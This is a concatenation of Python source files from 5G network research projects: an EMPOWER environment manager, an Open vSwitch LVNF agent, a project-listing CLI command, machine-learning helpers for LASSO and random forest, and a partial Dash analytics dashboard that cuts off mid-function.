from empower_core.envmanager.cataloghandler import CatalogHandler
from empower_core.envmanager.envhandler import EnvHandler
class EnvManager(EService):
"""Environment manager."""
HANDLERS = [WorkersHandler, WorkerCallbacksHandler, CatalogHandler,
EnvHandler]
ENV_IMPL = Env
env = None
@property
def catalog(self):
"""Return workers_package."""
return walk_module(self.catalog_packages)
@property
def catalog_packages(self):
"""Return catalog_packages."""
return self.params["catalog_packages"]
@catalog_packages.setter
def catalog_packages(self, value):
"""Set catalog_packages."""
self.params["catalog_packages"] = value
def start(self):
"""Start configuration manager."""
super().start()
if not self.ENV_IMPL.objects.all().count():
self.ENV_IMPL(project_id=uuid.uuid4()).save()
self.env = self.ENV_IMPL.objects.first()
self.env.start_services()
def launch(context, service_id, catalog_packages=""):
""" Initialize the module. """
return EnvManager(context=context, service_id=service_id,
catalog_packages=catalog_packages)
``` |
{
"source": "5g-empower/empower-lvnf-agent",
"score": 2
} |
#### File: empower/agent/agent.py
```python
import time
import logging
import re
import sys
import json
from uuid import UUID
from argparse import ArgumentParser
import websocket
import _thread
from empower.datatypes.etheraddress import EtherAddress
from empower.core.jsonserializer import EmpowerEncoder
from empower.agent.utils import get_xid
from empower.core.image import Image
from empower.agent.lvnf import get_hw_addr
from empower.agent.lvnf import exec_cmd
from empower.agent.lvnf import LVNF
from empower.agent import PT_VERSION
from empower.agent import PT_HELLO
from empower.agent import PT_CAPS_RESPONSE
from empower.agent import PT_LVNF_STATUS_RESPONSE
from empower.agent import PT_LVNF_STATS_RESPONSE
from empower.agent import PT_LVNF_GET_RESPONSE
from empower.agent import PT_LVNF_SET_RESPONSE
from empower.agent import PT_ADD_LVNF_RESPONSE
from empower.agent import PT_DEL_LVNF_RESPONSE
BRIDGE = "br-ovs"
DEFAULT_EVERY = 2
CTRL_IP = "127.0.0.1"
CTRL_PORT = 4422
CLICK_LISTEN = 7000
OF_CTRL = None
def dump_message(message):
"""Dump a generic message.
Args:
message, a message
Returns:
None
"""
header = "Received %s seq %u" % (message['type'], message['seq'])
del message['version']
del message['type']
del message['seq']
fields = ["%s=%s" % (k, v)for k, v in message.items()]
logging.info("%s (%s)", header, ", ".join(fields))
def on_open(websock):
""" Called when the web-socket is opened. """
logging.info("Socket %s opened...", websock.url)
websock.send_hello()
def run(websock):
"""Start hello messages."""
if websock.sock and websock.sock.connected:
time.sleep(websock.every)
websock.send_hello()
_thread.start_new_thread(run, (websock,))
_thread.start_new_thread(run, (websock,))
def on_message(websock, message):
""" Called on receiving a new message. """
try:
websock.downlink_bytes += len(message)
msg = json.loads(message)
websock.handle_message(msg)
except ValueError as ex:
logging.info("Invalid input: %s", ex)
logging.info(message)
def on_close(websock):
""" Called when the web-socket is closed. """
logging.info("Socket %s closed...", websock.url)
class EmpowerAgent(websocket.WebSocketApp):
"""The Empower Agent.
Attributes:
bridge: The OpenVSwitch bridge used by this agent
addr: This agent id (EtherAddress)
seq: The next sequence number (int)
prefix: The next virtual network function interface prefix (int)
every: The hello period (in s)
functions: the currently deployed lvnfs
vnf_seq: the next virtual tap interface id
"""
def __init__(self, url, ctrl, bridge, every, listen, logdir):
super().__init__(url)
self.__bridge = None
self.__ctrl = None
self.__seq = 0
self.__prefix = 0
self.__vnf_seq = 0
self.addr = None
self.dpid = None
self.every = every
self.listen = listen
self.functions = {}
self.lvnfs = {}
self.downlink_bytes = 0
self.uplink_bytes = 0
self.bridge = bridge
self.ctrl = ctrl
self.on_open = None
self.on_close = None
self.on_message = None
self.click = "/usr/local/bin/click"
self.logdir = logdir
logging.info("Initializing the EmPOWER Agent...")
logging.info("Bridge %s (hwaddr=%s, dpid=%s)",
self.bridge, self.addr, self.dpid)
for port in self.ports.values():
logging.info("Port %u (iface=%s, hwaddr=%s)",
port['port_id'], port['iface'], port['hwaddr'])
def shutdown(self):
"""Gracefully stop agent."""
for lvnf in self.lvnfs.values():
lvnf.stop(0)
@property
def ports(self):
"""Return the ports on the bridge.
Fetch the list of ports currently defined on the OVS switch.
Returns:
A dict mapping port id with interface name and hardware address.
For example:
{1: {'iface': 'eth0', 'addr': EtherAddress('11:22:33:44:55:66')}}
Raises:
OSError: An error occured accessing the interface.
FileNotFoundError: an OVS utility is not available.
"""
ports = {}
if not self.bridge:
raise OSError('Bridge is not defined')
cmd = ["ovs-ofctl", "show", self.bridge]
lines = exec_cmd(cmd).split('\n')
for line in lines:
regexp = r'([0-9]*)\((.*)\): addr:([0-9a-fA-F:]*)'
mat = re.match(regexp, line.strip())
if mat:
groups = mat.groups()
ports[int(groups[0])] = {'port_id': int(groups[0]),
'iface': groups[1],
'hwaddr': EtherAddress(groups[2])}
return ports
@property
def bridge(self):
"""Return the bridge."""
return self.__bridge
@bridge.setter
def bridge(self, bridge):
"""Set the bridge.
Set the bridge for this agent. The method checks if a bridge with the
specified name exists and then tries to fetch the list of ports on
this switch.
Args:
bridge: The name of the bridge as a string.
Returns:
None
Raise:
OSError: An error occured accessing the interface.
FileNotFoundError: an OVS utility is not available.
"""
self.addr = EtherAddress(get_hw_addr(bridge))
self.__bridge = bridge
cmd = ["ovs-ofctl", "show", self.bridge]
lines = exec_cmd(cmd).split('\n')
for line in lines:
if "dpid" in line:
dpid = line.split("dpid:")[1]
self.dpid = ':'.join(dpid[i:i + 2].upper()
for i in range(0, len(dpid), 2))
cmd = ["ovs-vsctl", "list-ports", self.bridge]
lines = exec_cmd(cmd).split('\n')
for line in lines:
regexp = 'vnf-([A-Za-z0-9]*)-([0-9]*)-([0-9]*)'
match = re.match(regexp, line.strip())
if match:
groups = match.groups()
iface = "vnf-%s-%s-%s" % groups
logging.info("Stale port found %s", iface)
exec_cmd(["ovs-vsctl", "del-port", self.bridge, iface])
@property
def ctrl(self):
"""Return the ctrl."""
return self.__ctrl
@ctrl.setter
def ctrl(self, ctrl):
"""Set the ctrl.
Set the controller for the bridge used by this agent. This must be
called AFTER setting the bridge otherwise the method will fail.
Args:
ctrl: the controller url in the for tcp:<ip>:<port>
Returns:
None
Raise:
OSError: An error occured accessing the interface.
FileNotFoundError: an OVS utility is not available.
"""
if not ctrl:
self.__ctrl = None
return
cmd = ["ovs-vsctl", "set-controller", self.bridge, ctrl]
exec_cmd(cmd)
self.__ctrl = ctrl
@property
def vnf_seq(self):
"""Return new VNF seq."""
self.__vnf_seq += 1
return self.__vnf_seq
@property
def seq(self):
"""Return the next sequence number."""
self.__seq += 1
return self.__seq
def prefix(self):
"""Return the next virtual network function interface prefix."""
self.__prefix += 1
return self.__prefix
def handle_message(self, msg):
""" Handle incoming message (as a Python dict). """
handler_name = "_handle_%s" % msg['type']
if not hasattr(self, handler_name):
logging.info("Unknown message type: %s", msg['type'])
return
handler = getattr(self, handler_name)
handler(msg)
def send_message(self, message_type, message, xid):
"""Add fixed header fields and send message. """
message['version'] = PT_VERSION
message['type'] = message_type
message['cpp'] = self.addr
message['seq'] = self.seq
message['xid'] = xid
logging.info("Sending %s seq %u xid %u",
message['type'],
message['seq'],
message['xid'])
msg = json.dumps(message, cls=EmpowerEncoder)
self.uplink_bytes += len(msg)
self.send(msg)
def send_hello(self):
""" Send HELLO message. """
hello = {'every': self.every}
self.send_message(PT_HELLO, hello, get_xid())
def send_caps_response(self, xid):
""" Send CAPS RESPONSE message. """
caps = {'dpid': self.dpid, 'ports': self.ports}
self.send_message(PT_CAPS_RESPONSE, caps, xid)
def send_lvnf_status_response(self, xid):
""" Send STATUS FUNCTION message. """
for lvnf in self.lvnfs.values():
self.send_message(PT_LVNF_STATUS_RESPONSE, lvnf.to_dict(), xid)
def send_add_lvnf_response(self, lvnf_id, xid):
""" Send ADD_LVNF_RESPONSE message. """
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
status = self.lvnfs[lvnf_id].to_dict()
self.send_message(PT_ADD_LVNF_RESPONSE, status, xid)
def send_del_lvnf_response(self, lvnf_id, xid):
""" Send DEL_LVNF_RESPONSE message. """
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
status = self.lvnfs[lvnf_id].to_dict()
self.send_message(PT_DEL_LVNF_RESPONSE, status, xid)
def _handle_caps_request(self, message):
"""Handle CAPS_REQUEST message.
Args:
message, a CAPS_REQUEST message
Returns:
None
"""
dump_message(message)
self.send_caps_response(message['xid'])
def _handle_lvnf_status_request(self, message):
"""Handle STATUS_LVNF message.
Args:
message, a STATUS_LVNF message
Returns:
None
"""
dump_message(message)
self.send_lvnf_status_response(message['xid'])
def _handle_lvnf_stats_request(self, message):
"""Handle LVNF_STATS message.
Args:
message, a LVNF_STATS message
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
message['stats'] = self.lvnfs[lvnf_id].stats()
self.send_message(PT_LVNF_STATS_RESPONSE, message, message['xid'])
def _handle_add_lvnf(self, message):
"""Handle ADD_LVNF message.
Args:
message, a ADD_LVNF message
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
tenant_id = UUID(message['tenant_id'])
context = message['context']
xid = message['xid']
image = Image(nb_ports=message['image']['nb_ports'],
vnf=message['image']['vnf'],
state_handlers=message['image']['state_handlers'],
handlers=message['image']['handlers'],)
lvnf = LVNF(agent=self,
lvnf_id=lvnf_id,
tenant_id=tenant_id,
image=image,
bridge=self.bridge,
vnf_seq=self.vnf_seq,
context=context)
lvnf.start(xid)
def _handle_del_lvnf(self, message):
"""Handle DEL_LVNF message.
Args:
message, a DEL_LVNF message
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
xid = message['xid']
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
lvnf = self.lvnfs[lvnf_id]
lvnf.stop(xid)
def _handle_lvnf_get_request(self, message):
"""Handle an incoming LVNF_GET_REQUEST.
Args:
message, a LVNF_GET_REQUEST
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
lvnf = self.lvnfs[lvnf_id]
ret = lvnf.read_handler(message['handler'])
message['retcode'] = ret[0]
message['samples'] = ret[1]
self.send_message(PT_LVNF_GET_RESPONSE, message, message['xid'])
def _handle_lvnf_set_request(self, message):
"""Handle an incoming LVNF_SET_REQUEST.
Args:
message, a LVNF_SET_REQUEST
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
lvnf = self.lvnfs[lvnf_id]
ret = lvnf.write_handler(message['handler'], message['value'])
message['retcode'] = ret[0]
message['samples'] = ret[1]
self.send_message(PT_LVNF_SET_RESPONSE, message, message['xid'])
def main():
"""Parse the command line and set the callbacks."""
usage = "%s [options]" % sys.argv[0]
parser = ArgumentParser(usage=usage)
parser.add_argument("-l", "--logdir", dest="logdir", default=None,
help="Logfile; default=None")
parser.add_argument("-o", "--ofctrl", dest="ofctrl", default=OF_CTRL,
help="OpenFlow Controller; default=%s" % OF_CTRL)
parser.add_argument("-c", "--ctrl", dest="ctrl", default=CTRL_IP,
help="Controller address; default=%s" % CTRL_IP)
parser.add_argument("-p", "--port", dest="port", default=CTRL_PORT,
type=int,
help="Controller port; default=%u" % CTRL_PORT)
parser.add_argument("-b", "--bridge", dest="bridge", default=BRIDGE,
help="Bridge interface; default='%s'" % BRIDGE)
parser.add_argument("-t", "--transport", dest="transport", default="ws",
help="Specify the transport; default='ws'")
parser.add_argument("-e", "--every", dest="every", default=DEFAULT_EVERY,
help="Heartbeat (in s); default='%u'" % DEFAULT_EVERY)
parser.add_argument("-g", "--listen", dest="listen", default=CLICK_LISTEN,
type=int,
help="Click port; default=%u" % CLICK_LISTEN)
(args, _) = parser.parse_known_args(sys.argv[1:])
if args.logdir:
logging.basicConfig(filename=args.logdir + "/agent.log",
level=logging.DEBUG)
else:
logging.basicConfig(level=logging.DEBUG)
url = "%s://%s:%u/" % (args.transport, args.ctrl, args.port)
agent = EmpowerAgent(url, args.ofctrl, args.bridge, args.every,
args.listen, args.logdir)
agent.on_open = on_open
agent.on_message = on_message
agent.on_close = on_close
while True:
try:
logging.info("Trying to connect to controller %s", url)
agent.run_forever()
logging.info("Unable to connect, trying again in %us", agent.every)
time.sleep(agent.every)
except KeyboardInterrupt:
agent.shutdown()
sys.exit()
if __name__ == "__main__":
main()
``` |
{
"source": "5g-empower/empower-runtime",
"score": 2
} |
#### File: cli/projects_commands/list_projects.py
```python
import empower_core.command as command
def do_cmd(gargs, *_):
"""List projects. """
_, data = command.connect(gargs, ('GET', '/api/v1/projects'), 200)
for entry in data.values():
accum = []
accum.append("project_id ")
accum.append(entry['project_id'])
accum.append(" desc \"%s\"" % entry['desc'])
if 'wifi_props' in entry and entry['wifi_props']:
accum.append(" ssid \"%s\"" % entry['wifi_props']['ssid'])
if 'lte_props' in entry and entry['lte_props']:
accum.append(" plmnid \"%s\"" % entry['lte_props']['plmnid'])
print(''.join(accum))
``` |
{
"source": "5genesis/Analytics",
"score": 3
} |
#### File: Feature_Selection/feature_selection/LASSO.py
```python
import pandas as pd
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.linear_model import Lasso
def LASSO(df,target,alpha=.1,drop_features=[]):
#remove non numeric columns and undesired features from dataframe
df=df.select_dtypes(exclude=['object'])
const_feat=list(df.columns[df.nunique() <= 1])
drop_features=drop_features+const_feat
df = df.drop(drop_features, axis=1)
df.dropna(inplace=True)
#if target constant avoid crashing
if target in const_feat:
score=[0 for feat in df.columns]
score = pd.Series(score,index = list(df.columns))
return None, list(df.columns), score
#scale data before using Lasso
scaler=StandardScaler()
scaler.fit(df)
df[df.columns]=scaler.transform(df[df.columns])
y=df[target]
X=df.drop(target,1)
#lr = LinearRegression()
#lr.fit(X, y)
rr = Lasso(alpha=alpha,max_iter=1e5) # higher the alpha value, more restriction on the coefficients; low alpha > more generalization, coefficients are barely
# restricted and in this case linear and ridge regression resembles
rr.fit(X, y)
coef = pd.Series(rr.coef_, index = X.columns)
#imp_coef = coef.sort_values()
new_features=list(coef[coef!=0].index)
original_features=list(X.columns)
return new_features, original_features, coef
```
#### File: Prediction/prediction/random_forest.py
```python
__author__ = '<NAME>'
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error, explained_variance_score
from sklearn.model_selection import cross_val_score
"""
Computing random forest on the data
"""
def random_forest(dataframe, target=None, drop_features=[], split=0.2, cross_val=False):
# Remove non-numerical and undesired features from dataframe
dataframe = dataframe.loc[:, dataframe.dtypes != 'object']
dataframe = dataframe.drop(drop_features, axis=1)
# Transform data into columns and define target variable
numerical_features = dataframe.loc[:, dataframe.columns != target]
X = np.nan_to_num(numerical_features.to_numpy()) # .reshape(numerical_features.shape)
y = np.nan_to_num(dataframe[target].to_numpy()) # .reshape(dataframe[target].shape[0], 1)
# Split the data into training/testing sets
testsplit = round(split * X.shape[0])
X_train = X[:-testsplit]
X_test = X[-testsplit:]
y_train = y[:-testsplit]
y_test = y[-testsplit:]
# Train linear regression model
reg = RandomForestRegressor(max_depth=7, n_estimators=100, min_samples_split=2, min_samples_leaf=3, bootstrap=True, criterion='mse', max_features=None)
reg.fit(X_train, y_train)
feature_importance = pd.Series(reg.feature_importances_, index=numerical_features.columns)
# Prediction with trained model
y_pred = reg.predict(X_test)
results = pd.Series()
if not cross_val:
results['Train mean'] = np.mean(y_train)
results['Train std'] = np.std(y_train)
results['Test mean'] = np.mean(y_test)
results['Test std'] = np.std(y_test)
results['Prediction mean'] = np.mean(y_pred)
results['Prediction std'] = np.std(y_pred)
results['Mean Squared Error'] = mean_squared_error(y_test, y_pred)
results['Mean Absolute Error'] = mean_absolute_error(y_test, y_pred)
results['R2 score'] = r2_score(y_test, y_pred)
results['Explained variance score'] = explained_variance_score(y_test, y_pred)
else:
results['Cross-val R2 score (mean)'] = np.mean(cross_val_score(reg, X, y, cv=10, scoring="r2"))
results['Cross-val R2 scores'] = cross_val_score(reg, X, y, cv=10, scoring="r2")
results['Cross-val explained_variance score (mean)'] = np.mean(cross_val_score(reg, X, y, cv=10, scoring="explained_variance"))
results['Cross-val explained_variance scores'] = cross_val_score(reg, X, y, cv=10, scoring="explained_variance")
y_result = pd.DataFrame({'y_test': y_test, 'y_pred': y_pred})
return feature_importance, results, y_result, reg
```
#### File: Visualization/visualization/__main__.py
```python
__author__ = '<NAME>, SRL'
from flask import Flask, send_file
import plotly
import plotly.graph_objects as go
import dash
import dash_table
from dash_table.Format import Format, Scheme
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
import numpy as np
from dash.dependencies import Input, Output, State
import json
import requests
from urllib.parse import urlparse, parse_qs
import pandas as pd
from datetime import datetime
from io import BytesIO
import jwt
from typing import List, Tuple
class Crypt:
def __init__(self, secret: str):
self.secret = secret
def Encode(self, target: int, executions: List[int]) -> str:
"""'target' is the landing experiment execution, 'executions' is
the list of all executions belonging to the user"""
payload = {"t": target, "l": executions}
token = jwt.encode(payload, self.secret, algorithm="HS256")
if isinstance(token, bytes): # Older versions of jwt return bytes
token = token.decode(encoding="UTF-8")
return token
def Decode(self, token: str) -> Tuple[int, List[int]]:
"""Returns a tuple (<landing execution>, <list of executions>)"""
payload = jwt.decode(token, self.secret, algorithms=["HS256"])
return payload["t"], payload["l"]
server = Flask(__name__)
@server.route('/', methods=['GET'])
def index():
return {'about': "Visualization service for 5Genesis Analytics Component. Visit /help for more info and /dash to bring up the dashboard."}, 200
# Fetch the data source options
def fetch_datasource_options():
link = "http://data_handler:5000/get_datasources"
try:
data = requests.get(link).json()
return [{'label': item, 'value': item} for item in data['sources']]
except requests.HTTPError:
return [{'label': 'No datasource available', 'value': ''}]
datasource_options = fetch_datasource_options()
app = dash.Dash(
__name__,
server=server,
routes_pathname_prefix='/dash/',
external_stylesheets=[dbc.themes.BOOTSTRAP]
)
stat_indicators = ['Mean', 'Standard Deviation', 'Median', 'Min', 'Max',
'25% Percentile', '75% Percentile', '5% Percentile', '95% Percentile']
app.layout = dbc.Container([
dcc.Location(id='url', refresh=False),
dbc.Row([
dbc.Col([
html.Div([
html.Img(src=app.get_asset_url('5genesis_logo.png'), # from https://pbs.twimg.com/media/EWm7hjlX0AUl_AJ.png
style={'height': '12rem', 'width': '12rem', 'border-radius': '50%'}),
html.H2("Analytics", style={'margin-top': '2rem'})
], style={'display': 'block', 'text-align': 'center', 'padding-top': '2rem'}),
html.Br(),
html.Div([
html.Div('Database'),
dcc.Dropdown(
options=datasource_options,
value=datasource_options[0]['value'],
id='datasource',
searchable=False,
clearable=False
)
]),
html.Br(),
html.Div([
html.Div('Experiment ID'),
dcc.Dropdown(id='experiment')
]),
html.Br(),
html.Div([
html.Div('Measurement Table'),
dcc.Dropdown(
id='measurement',
multi=True)
]),
html.Br(),
html.Div([
html.Div('Available Features'),
dcc.Dropdown(id='kpi', multi=True)
]),
html.Br(),
html.Hr(),
html.Br(),
html.Div([
html.Div('Outlier Detection Algorithm'),
dcc.Dropdown(
options=[
{'label': 'None', 'value': 'None'},
{'label': 'Z-score', 'value': 'zscore'},
{'label': 'MAD', 'value': 'mad'}],
value='None',
id='outlier',
searchable=False,
clearable=False
)]),
html.Br(),
html.Div([
html.Div('Time resolution'),
dcc.Input(
id="time_resolution",
type='text',
placeholder="1s",
value='1s',
style={'width': '75px'}
)
]),
html.Br(),
html.Div(
html.A(
dbc.Button('Reset', id='purge_cache_button'),
href='/dash/'
), style={'textAlign': 'center'})
], width=2, style={'background-color': "#f8f9fa"}),
dbc.Col([
# Hidden divisions to store data that'll be used as input for different callbacks
html.Div(id='df', style={'display': 'none'}),
html.Div(id='df_no_outliers', style={'display': 'none'}),
html.Div(id='test_case_stat_df', style={'display': 'none'}),
html.Div(id='it_stat_df', style={'display': 'none'}),
# html.Div(id='corr_matrix_download_data', style={'display': 'none'}),
# html.Div(id='corr_table_download_data', style={'display': 'none'}),
html.Div(id='prediction_results_df', style={'display': 'none'}),
# html.Br(),
# Create tabs
dcc.Tabs(id='tabs', value='time-series-tab', children=[
# Time Series tab
dcc.Tab(label='Time Series Overview', value='time-series-tab', children=[
# Time series graph
dbc.Row(dbc.Col(dcc.Graph(id='graph'))),
# dcc.Graph(id='graph_no_outliers')
# # download link
# dbc.Row(dbc.Col(
# html.A(
# 'Download Raw Data',
# id='download-link',
# download="",
# href="",
# target="_blank"
# )
# ))
]),
# Statistical Analysis tab
dcc.Tab(label='Statistical Analysis', value='stat-analysis-tab', children=[
# graph
dbc.Row(dbc.Col(
dcc.Graph(id='box_plot')
)),
# table
dbc.Row(dbc.Col([
html.H4(children='Test Case Statistics'),
dash_table.DataTable(
id='table',
columns=[
{'name': 'Indicator', 'id': 'Indicator'},
{'name': 'Value', 'id': 'Value', 'type': 'numeric',
'format': Format(precision=2, scheme=Scheme.fixed)},
{'name': 'Confidence Interval', 'id': 'Confidence Interval', 'type': 'numeric',
'format': Format(precision=2, scheme=Scheme.fixed)}
]
),
# # download links
# html.Div(
# html.A(
# 'Download Per Iteration Statistics',
# id='iteration_download',
# download="",
# href="",
# target="_blank"
# ),
# ),
# html.Div(
# html.A(
# 'Download Test Case Statistics',
# id='test_case_download',
# download="",
# href="",
# target="_blank"
# )
# )
], width=6), justify='center')
]),
# Correlation tab
dcc.Tab(label='Correlation', value='correlation-tab', children=[
dcc.Tabs(id="corr-tabs", value="cross-correlation-tab", children=[
# Correlation Matrix
dcc.Tab(label='Cross-correlation of fields within the same experiment', value="cross-correlation-tab", children=[
dbc.Row(dbc.Col([
html.Div('Correlation method', style={'margin-top': '20px'}),
dcc.Dropdown(
options=[
{'value': 'pearson', 'label': 'Pearson correlation coefficient'},
{'value': 'kendall', 'label': 'Kendall Tau correlation coefficient'},
{'value': 'spearman', 'label': 'Spearman rank correlation'}
],
value='pearson',
id='correlation-method',
searchable=False,
clearable=False
)
], width=3)),
dbc.Row(dbc.Col(
dcc.Graph(id='correlation_graph')
)),
# dbc.Row(dbc.Col(
# # download link
# html.A(
# 'Download Correlation Matrix Data',
# id='corr_matrix_download',
# download="",
# href="",
# target="_blank"
# )
# ))
]),
# Correlation table
dcc.Tab(label='Correlation of fields between two different experiments', value='experiment-correlation-tab', children=[
dbc.Row(dbc.Col([
html.Div('Pick Second Experiment ID', style={'margin-top': '20px'}),
dcc.Dropdown(id='experiment2'),
html.Br()
], width=3), justify='center'),
dbc.Row(dbc.Col(
dash_table.DataTable(
id='correlation_table',
columns=[
{'name': 'Correlation Field', 'id': 'Correlation Field', 'type': 'text'},
{'name': 'Value', 'id': 'Value', 'type': 'numeric', 'format': Format(precision=2, scheme=Scheme.fixed)}
], style_data={'width': '250px'}
), width='auto'
), justify='center'),
# dbc.Row(dbc.Col(
# # download link
# html.A(
# 'Download Correlation Table Data',
# id='corr_table_download',
# download="",
# href="",
# target="_blank"
# )
# ))
])
])
]),
# Feature Selection tab
dcc.Tab(label='Feature Selection', value='feature-selection-tab', children=[
# hidden division to store data
html.Div(id='feature_score', style={'display': 'none'}),
dbc.Row([
dbc.Col([
# Options
html.Div('Select Algorithm', style={'margin-top': '20px'}),
dcc.Dropdown(
options=[
{'label': 'Backward Elimination', 'value': 'backward'},
{'label': 'RFE', 'value': 'rfe'},
{'label': 'Lasso', 'value': 'lasso'}
],
value='lasso',
id='method',
searchable=False,
clearable=False
)
], width=2),
dbc.Col([
html.Div('Drop Features', style={'margin-top': '20px'}),
dcc.Dropdown(
id='drop_features',
multi=True
)
], width=3),
dbc.Col([
html.Div('Normalize (for RFE)', style={'margin-top': '20px'}),
dcc.RadioItems(
options=[
{'label': 'Yes', 'value': 'true'},
{'label': 'No', 'value': 'false'},
],
value='true',
id='normalize',
labelStyle={'display': 'inline-block', 'margin-top': '5px'}
)
], width='auto'),
dbc.Col([
html.Div('Alpha (for Lasso)', style={'margin-top': '20px'}),
dcc.Input(
id='alpha',
type='number',
value=0.1,
min=0, max=10, step=0.1
)
], width='auto')
]),
dbc.Row(dbc.Col(dcc.Graph(id='feature_bar'))),
# dbc.Row(dbc.Col(
# # download link
# html.A(
# 'Download Feature Selection Scores',
# id='features_download',
# download="",
# href="",
# target="_blank"
# )
# ))
]),
# Prediction tab
dcc.Tab(label='Prediction', value='prediction-tab', children=[
dbc.Row([
# Options
dbc.Col([
html.Div('Select Algorithm', style={'margin-top': '20px'}),
dcc.Dropdown(
options=[
{'label': 'Linear Regression',
'value': 'linreg'},
{'label': 'Random Forest',
'value': 'rf'},
{'label': 'SVR', 'value': 'svr'}
],
value='linreg',
id='algorithm',
searchable=False,
clearable=False
)
], width=2),
dbc.Col([
html.Div('Drop Features', style={'margin-top': '20px'}),
dcc.Dropdown(
id='drop_features_pred',
multi=True
)
], width=3),
dbc.Col(
dbc.Button('Automatic feature selection', id='drop_features_button', color='light', style={'margin-top': '43px'}),
width="auto"
),
dbc.Col(
dbc.Button('Train model', id='train_button', style={'margin-top': '43px'}),
width="auto"
)
]),
dbc.Row(
# Prediction values graph
dbc.Col(dbc.Col(dcc.Graph(id='predicted_values_graph')))
),
dbc.Row([
# Prediction results
dbc.Col(
html.Div([
html.H4('Training results'),
dash_table.DataTable(
id='prediction_result_table',
columns=[
{
'name': 'Metric',
'id': 'Metric',
'type': 'text'
}, {
'name': 'Value',
'id': 'Value',
'type': 'numeric',
'format': Format(precision=2, scheme=Scheme.fixed)
}
]
)
], style={'text-align': 'center'}), width=4
),
# Coefficient table
dbc.Col(
html.Div([
html.H4('Model coefficients'),
dash_table.DataTable(
id='prediction_coefficient_table',
columns=[
{
'name': 'Feature',
'id': 'Feature',
'type': 'text'
}, {
'name': 'Value',
'id': 'Value',
'type': 'numeric',
'format': Format(precision=4, scheme=Scheme.fixed)
}
]
)
], style={'text-align': 'center'}), width=4
)
], justify="around"),
dbc.Row(
dbc.Col(
html.A(
dbc.Button('Download model', id='download_button', style={'margin-bottom': '50px'}),
id='model_download_link',
href=None
), width="auto"
), justify="center"
)
])
])
])
])
], fluid=True)
def empty_figure(title='No data'):
return {
'data': [{'x': 0, 'y': 0}],
'layout': {'title': title}
}
empty_fig = empty_figure()
kpi_filter_list = ['Available RAM', 'PacketsReceived', 'Total RAM', 'Used CPU Per Cent', 'Used RAM', 'Used RAM Per Cent', # malaga old names
'host', 'Cell ID', 'Cell',
'facility', 'facility_x', 'facility_y',
'Success', 'Success_x', 'Success_y',
'hostname', 'hostname_x', 'hostname_y',
'appname', 'appname_x', 'appname_y',
'series', 'series_x', 'series_y',
'_iteration_', '_iteration__x', '_iteration__y',
'ExecutionId', 'ExecutionId_x', 'ExecutionId_y', 'Timestamp_x', 'Timestamp_y',
'Operator', 'DateTime', 'Network', 'LAC', 'PSC',
'AWGN State', 'Verdict']
meas_filter_list = ['execution_metadata', 'syslog']
# callback to return experiment ID options
@app.callback(
[Output('experiment', 'options'),
Output('experiment', 'value')],
[Input('url', 'search'),
Input('datasource', 'value')])
def experimentID_list(search, datasource):
if not search or not datasource:
return [], None
start = datetime.now()
params = parse_qs(urlparse(search).query)
token = params['token'][0]
if token == secret:
link = f'http://data_handler:5000/get_all_experimentIds/{datasource}'
r = requests.get(link)
experiment_list = list(r.json().values())[0]
experiment_target = None
else:
experiment_target, experiment_list = decoder.Decode(token)
if experiment_target and experiment_target not in experiment_list:
experiment_list += [experiment_target]
print(f"-- experimentID_list: {datetime.now()-start}", flush=True)
return [{'label': item, 'value': item} for item in sorted(experiment_list)], experiment_target
# callback to return measurement options
@app.callback(
[Output('measurement', 'options'),
Output('measurement', 'value')],
[Input('experiment', 'value')],
[State('datasource', 'value')])
def find_measurement(experiment, datasource):
if not experiment or not datasource:
return [], None
start = datetime.now()
link = f'http://data_handler:5000/get_measurements_for_experimentId/{datasource}/{experiment}'
r = requests.get(link)
meas_list = list(r.json().values())[0]
temp = []
for i in meas_list:
if i not in meas_filter_list: # to avoid having measurement tables which raise errors
temp.append({'label': i, 'value': i})
print(f"-- find_measurement: {datetime.now()-start}", flush=True)
return temp, None
# callback used to store the df in a hidden division
@app.callback(
Output('df', 'children'),
[Input('measurement', 'value'),
Input('outlier', 'value'),
Input('datasource', 'value'),
Input('experiment', 'value'),
Input('time_resolution', 'value'),
Input('purge_cache_button', 'n_clicks')])
def retrieve_df(measurement, outlier, datasource, experiment, time_resolution, purge_cache):
# input check - this order required (at first value is none, when filled it is a list)
if not measurement or not experiment or not time_resolution:
# empty_df = pd.DataFrame(data={})
return None
context = dash.callback_context
if context and context.triggered[0]['prop_id'].split('.')[0] == 'purge_cache_button':
requests.get('http://data_handler:5000/purge_cache')
return None
start = datetime.now()
link = f'http://data_handler:5000/get_data/{datasource}/{experiment}'
param_dict = {
'match_series': False,
'measurement': measurement,
'max_lag': time_resolution,
'remove_outliers': outlier
}
r = requests.get(link, params=param_dict)
print(f"-- retrieve_df: {datetime.now()-start}", flush=True)
# return df.to_json()
return r.text
@app.callback(
[Output('kpi', 'options'),
Output('kpi', 'value')],
[Input("df", "children")])
def update_dropdown(df):
if not df:
return [], None
start = datetime.now()
temp = []
df = pd.read_json(df)
for i in df.columns:
if not len(df[i].dropna()) == 0 and i not in kpi_filter_list:
temp.append({'label': i, 'value': i})
print(f"-- update_dropdown: {datetime.now()-start}", flush=True)
return temp, None
###
# Time Series Overview tab
###
# Time series graph
@app.callback(
Output('graph', 'figure'),
[Input('kpi', 'value'),
Input("outlier", 'value'),
Input('tabs', 'value')],
[State("df", "children")])
def update_graph(kpi, outlier, tab, df):
# input check
if not kpi or not df or not outlier or tab != "time-series-tab":
return empty_fig
start = datetime.now()
df = pd.read_json(df)
traces = []
for i in range(len(kpi)):
